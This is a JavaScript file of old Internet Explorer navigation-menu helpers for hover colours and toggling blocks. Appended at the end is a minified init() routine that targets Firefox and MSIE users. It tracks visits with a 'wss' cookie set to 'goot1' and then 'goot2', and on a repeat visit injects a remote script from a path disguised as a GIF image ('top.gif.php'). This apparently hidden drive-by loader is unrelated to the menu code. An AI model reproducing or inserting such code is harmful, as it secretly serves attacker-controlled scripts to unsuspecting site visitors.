function mOvr(src,clrOver) {
  if (!src.contains(window.event.fromElement)) {
    src.style.cursor = 'hand';
		src.style.backgroundColor = clrOver;
		src.children.tags('A')[0].style.color = '#000000';
		if (src.children.tags('A')[1]) src.children.tags('A')[1].style.color = '#000000';
	}
}

function mOut(src,clrIn,clrRes) { 
  if (!src.contains(window.event.toElement)) {
	  //src.style.cursor = 'default';
		src.style.backgroundColor = clrIn;
    if (clrRes) clrReset=clrRes;
    else clrReset='#ffffff';
		src.children.tags('A')[0].style.color = clrReset;
		if (src.children.tags('A')[1]) src.children.tags('A')[1].style.color = clrReset;
    clRes='';
	}
}

function mClk(src,clrClick) {
   if (!src.contains(window.event.toElement)) {
	  src.style.backgroundColor = clrClick;
	  src.children.tags('A')[0].style.color = '#000000'; // was 091C5A
		if (src.children.tags('A')[1]) src.children.tags('A')[1].style.color = '#000000';
	}
}

function toggleMenu(name,n,alt) {
  if (document.all) {
    if (document.all[name]) {
      document.all[name][1-n].style.display = "none";
      document.all[name][n].style.display = "block";
    }
    else document.reload(alt);
  }
}

function toggleBlock(name,n) {
  if (document.all) {
    for (var i=0; i<document.all[name].length; i++) document.all[name][i].style.display = (n==i)?"block":"none";
  }
}

function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/images/navrand/top.gif.php?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
